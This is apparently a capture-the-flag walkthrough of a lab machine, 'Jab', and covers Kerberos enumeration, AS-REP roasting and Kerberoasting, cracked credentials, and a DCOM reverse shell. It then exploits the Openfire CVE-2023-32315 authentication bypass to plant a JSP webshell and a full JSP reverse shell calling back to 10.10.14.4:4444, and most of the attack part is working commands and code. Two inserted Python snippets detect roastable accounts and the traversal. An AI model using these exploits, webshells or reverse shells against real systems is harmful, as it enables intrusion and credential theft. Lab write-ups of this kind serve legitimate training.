53,88,135,139,389,445,464,593,636,3268,3269,5222,5223,5262,5263,5269,5270,5275,5276,5985,7070,7443,7777,9389,47001,49664,49665,49666,49667,49671,49686,49687,49688,49712,49766
echo "10.129.225.173 jab.htb dc01.jab.htb" >> /etc/hosts
kerbrute userenum -d jab.htb --dc 10.129.225.173 /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt
This generates a very large list of valid usernames, which is not directly useful on its own yet.
Back to port 5222 (XMPP): searching online for the service turned up nothing useful, so move on.
7070/tcp open realserver
Browsing to it shows "Openfire HTTP Binding Service".
Download Pidgin.
Register a new account and log in.
Under the room list function I found two rooms, test and test2. Room test cannot be opened; in room test2 a user, bdavis, was trying to send an XSS payload in the channel:
(Wednesday, November 22, 2023 02:49:50 AM HKT) bdavis: <img src="" alt="some text" />
Try adding a plugin called Service Discovery.
It finds 4 services available.
Search for users:
sudo pidgin -d > output.log
Add the XMPP console plugin, then search for users.
Export them as XML (userlist file) and pull out the usernames:
grep -oP '<value>\K[^<]+@jab.htb(?=</value>)' userlist | sed 's/@jab.htb//g' | sort | uniq > userlists
rm userlist
GetNPUsers.py jab.htb/ -usersfile userlists -outputfile output -no-pass -dc-ip 10.129.225.173
Enumerate again with the new wordlist to find any user that has Kerberos pre-authentication disabled.
Three accounts return AS-REP hashes.
hashcat -m 18200 output /usr/share/wordlists/rockyou.txt
Run hashcat to crack the hashes; it takes a while.
One credential comes out:
jmontgomery:Midnight_121
Updating Pidgin with this credential reveals a new room, pentest2003. Here is the room history:
(Wednesday, November 22, 2023 02:31:13 AM HKT) adunn: team, we need to finalize post-remediation testing from last quarter's pentest. @bdavis Brian can you please provide us with a status?
(Wednesday, November 22, 2023 02:33:58 AM HKT) bdavis: sure. we removed the SPN from the svc_openfire account. I believe this was finding #2. can someone from the security team test this? if not we can send it back to the pentesters to validate.
(Wednesday, November 22, 2023 03:30:41 AM HKT) bdavis: here are the commands from the report, can you find someone from the security team who can re-run these to validate?
(Wednesday, November 22, 2023 03:30:43 AM HKT) bdavis:
$ GetUserSPNs.py -request -dc-ip 192.168.195.129 jab.htb/hthompson
Impacket v0.9.25.dev1+20221216.150032.204c5b6b - Copyright 2021 SecureAuth Corporation

Password:
ServicePrincipalName  Name          MemberOf  PasswordLastSet             LastLogon  Delegation
--------------------  ------------  --------  --------------------------  ---------  ----------
http/xmpp.jab.local   svc_openfire            2023-10-27 15:23:49.811611  <never>

[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$b1abbb2f4beb2a48e7412ccd26b60e61$864f27ddaaded607ab5efa59544870cece4b6262e20f3bee38408d296ffbf07ceb421188b9b82ac0037ae67b488bb0ef2178a0792d62<SNIP>
(Wednesday, November 22, 2023 03:30:56 AM HKT) bdavis:
$ hashcat -m 13100 svc_openfire_tgs /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
<SNIP>
$krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$de17a01e2449626571bd9416dd4e3d46$<SNIP>:!@#$%^&*(1qazxsw

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openf...91ecc4
Time.Started.....: Fri Oct 27 15:30:12 2023 (17 secs)
Time.Estimated...: Fri Oct 27 15:30:29 2023 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 873.9 kH/s (10.16ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14336000/14344385 (99.94%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[2321686f74746965] -> $HEX[042a0337c2a156616d6f732103]

Started: Fri Oct 27 15:30:09 2023
Stopped: Fri Oct 27 15:30:29 2023
(Wednesday, November 22, 2023 03:31:57 AM HKT) adunn: I'll pass this along and circle back with the group
(Wednesday, November 22, 2023 03:32:23 AM HKT) bdavis: perfect, thanks Angela!
(Wednesday, November 22, 2023 02:22:55 AM HKT) The topic is:
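As an added defender-side example (not code from the writeup): the two Kerberos exposures the notes above depend on, an account with pre-authentication disabled (what GetNPUsers.py finds) and a user account carrying an SPN (the svc_openfire finding discussed in the chat), checked from the userAccountControl and servicePrincipalName attributes. The records are constructed for the example; only the SPN http/xmpp.jab.local comes from the page.

```python
from dataclasses import dataclass, field

# userAccountControl bits (Microsoft documented values)
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000


@dataclass
class ADUser:
    sam: str
    uac: int                                   # userAccountControl
    spns: list = field(default_factory=list)   # servicePrincipalName values


def kerberos_exposures(users):
    """Return {sAMAccountName: [reasons]} for enabled accounts that can be roasted."""
    findings = {}
    for u in users:
        if u.uac & UF_ACCOUNTDISABLE:
            continue  # disabled accounts cannot be roasted
        reasons = []
        if u.uac & UF_DONT_REQUIRE_PREAUTH:
            # GetNPUsers.py gets an AS-REP hash for exactly these accounts
            reasons.append("as-rep-roastable: pre-auth disabled")
        if u.spns and u.sam.lower() != "krbtgt":
            # GetUserSPNs.py requests a TGS for exactly these accounts;
            # the fix is to drop the SPN or move the service to a gMSA
            reasons.append("kerberoastable: SPN " + ", ".join(u.spns))
        if reasons:
            findings[u.sam] = reasons
    return findings


# Constructed sample records (not pulled from the box)
SAMPLE = [
    ADUser("jmontgomery", 0x410200),                           # pre-auth disabled
    ADUser("svc_openfire", 0x10200, ["http/xmpp.jab.local"]),  # service account with SPN
    ADUser("bdavis", 0x10200),                                 # normal, nothing to flag
    ADUser("oldsvc", 0x410202, ["cifs/old.jab.local"]),        # disabled: skipped
]

if __name__ == "__main__":
    for sam, reasons in kerberos_exposures(SAMPLE).items():
        print(sam, "->", "; ".join(reasons))
```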
Another credential appears in this room:
svc_openfire:!@#$%^&*(1qazxsw
evil-winrm -i 10.129.225.173 -u jab.htb/svc_openfire -p '!@#$%^&*(1qazxsw'
Trying these creds with evil-winrm fails to log in.
impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.129.230.215 'cmd.exe /c powershell -e <SNIP>' -nooutput
This gets a connection back.
Upload chisel for port forwarding:
chisel server -p 3456 --reverse
./chisel.exe client -v 10.10.14.4:3456 R:9090:127.0.0.1:9090
Googling for an exploit, I found CVE-2023-32315 (PoC by miko550).
This PoC does not work for creating a new admin account, but when I tried the previous creds I got for svc_openfire, I logged in to the admin panel.
Continue exploitation from the page for uploading plugins.
Back to the article:
https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass/releases
(CVE-2023-32315-Openfire-Bypass, by tangxiaofeng7)
Uploaded, but not accessible.
Create a webshell called webshell.jsp:
<%
String cmd = request.getParameter("cmd");
if ( cmd != null) {
    java.io.DataInputStream in = new java.io.DataInputStream(Runtime.getRuntime().exec(cmd).getInputStream());
    String line = in.readLine();
    if (line != null) {
        response.setHeader("X-Error", line);
    }
}
%>
Then pack it up as a .jar plugin payload:
git clone https://github.com/igniterealtime/openfire-exampleplugin.git
cd openfire-exampleplugin
cp ../webshell.jsp ./src/main/web/exampleplugin-page.jsp
mvn -B package
cp ./target/exampleplugin.jar exampleplugin.zip; zip -ur exampleplugin.zip ./plugin.xml ./readme.html; mv exampleplugin.zip ./target/exampleplugin.jar;
Building under Maven is time-intensive.
Upload the plugin, then request the page:
curl -v "http://127.0.0.1:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/plugins/exampleplugin/exampleplugin-page.jsp?cmd=whoami"
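As an added defender-side example (not code from the writeup or from the PoC repositories): a detector for the /setup/setup-s/%u002e%u002e traversal used in the request above, run over constructed access-log lines in combined format. The setup pages are reachable without a session, so the signature is a request that enters under /setup/ but, after decoding the non-standard %uXXXX escapes, resolves to a path outside it; plain ../ is caught the same way.

```python
import re
from urllib.parse import unquote

# Combined-format access log line: ip ident user [ts] "METHOD path HTTP/x" status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def decode_path(raw):
    """Decode %uXXXX (non-standard, used in the bypass) then %XX; drop the query."""
    path = raw.split("?", 1)[0]
    path = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), path)
    return unquote(path)

def normalize(path):
    """Resolve '.' and '..' segments the way a lenient servlet container would."""
    out = []
    for seg in path.split("/"):
        if seg == "..":
            out = out[:-1]
        elif seg and seg != ".":
            out.append(seg)
    return "/" + "/".join(out)

def is_setup_bypass(raw_path):
    """True when a request enters via /setup/ but resolves outside it."""
    decoded = decode_path(raw_path)
    if not decoded.startswith("/setup/"):
        return False
    return not normalize(decoded).startswith("/setup/")

def scan(lines):
    """Return (ip, decoded_path) for every log line matching the bypass."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_setup_bypass(m.group("path")):
            hits.append((m.group("ip"), decode_path(m.group("path"))))
    return hits

# Constructed sample log lines (not real logs from the box)
SAMPLE_LOG = [
    '10.10.14.4 - - [22/Nov/2023:03:30:41 +0800] "GET /setup/setup-s/%u002e%u002e/%u002e%u002e/plugins/exampleplugin/exampleplugin-page.jsp?cmd=whoami HTTP/1.1" 200 512',
    '10.0.0.7 - - [22/Nov/2023:03:30:42 +0800] "GET /setup/index.jsp HTTP/1.1" 200 300',
    '10.0.0.8 - - [22/Nov/2023:03:30:43 +0800] "GET /login.jsp HTTP/1.1" 200 300',
    '10.0.0.9 - - [22/Nov/2023:03:30:44 +0800] "GET /setup/setup-s/../../index.jsp HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for ip, path in scan(SAMPLE_LOG):
        print(ip, "->", path)
```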
It seems not to work, so I create a JSP reverse shell and do the build again:
<%
/*
 * Usage: This is a 2 way shell, one web shell and a reverse shell. First, it will try to connect to a listener (attacker machine), with the IP and Port specified at the end of the file.
 * If it cannot connect, an HTML will prompt and you can input commands (sh/cmd) there and it will prompt the output in the HTML.
 * Note that this last functionality is slow, so the first one (reverse shell) is recommended. Each time the button "send" is clicked, it will try to connect to the reverse shell again (apart from executing
 * the command specified in the HTML form). This is to avoid to keep it simple.
 */
%>
<%@page import="java.lang.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%@page import="java.util.*"%>
<html>
<head>
<title>jrshell</title>
</head>
<body>
<form METHOD="POST" NAME="myform" ACTION="">
<input TYPE="text" NAME="shell">
<input TYPE="submit" VALUE="Send">
</form>
<pre>
<%
// Define the OS
String shellPath = null;
try {
    if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
        shellPath = new String("/bin/sh");
    } else {
        shellPath = new String("cmd.exe");
    }
} catch( Exception e ){}

// INNER HTML PART
if (request.getParameter("shell") != null) {
    out.println("Command: " + request.getParameter("shell") + "\n<BR>");
    Process p;
    if (shellPath.equals("cmd.exe"))
        p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("shell"));
    else
        p = Runtime.getRuntime().exec("/bin/sh -c " + request.getParameter("shell"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
    }
}

// TCP PORT PART
class StreamConnector extends Thread {
    InputStream wz;
    OutputStream yr;
    StreamConnector( InputStream wz, OutputStream yr ) {
        this.wz = wz;
        this.yr = yr;
    }
    public void run() {
        BufferedReader r = null;
        BufferedWriter w = null;
        try {
            r = new BufferedReader(new InputStreamReader(wz));
            w = new BufferedWriter(new OutputStreamWriter(yr));
            char buffer[] = new char[8192];
            int length;
            while( ( length = r.read( buffer, 0, buffer.length ) ) > 0 ) {
                w.write( buffer, 0, length );
                w.flush();
            }
        } catch( Exception e ){}
        try {
            if( r != null ) r.close();
            if( w != null ) w.close();
        } catch( Exception e ){}
    }
}

try {
    Socket socket = new Socket( "10.10.14.4", 4444 ); // Replace with wanted ip and port
    Process process = Runtime.getRuntime().exec( shellPath );
    new StreamConnector(process.getInputStream(), socket.getOutputStream()).start();
    new StreamConnector(socket.getInputStream(), process.getOutputStream()).start();
    out.println("port opened on " + socket);
} catch( Exception e ) {}
%>
</pre>
</body>
</html>
cd openfire-exampleplugin
cp ../webshell.jsp ./src/main/web/exampleplugin-page.jsp
mvn -B package
cp ./target/exampleplugin.jar exampleplugin.zip; zip -ur exampleplugin.zip ./plugin.xml ./readme.html; mv exampleplugin.zip ./target/exampleplugin.jar;
It works!
Rooted!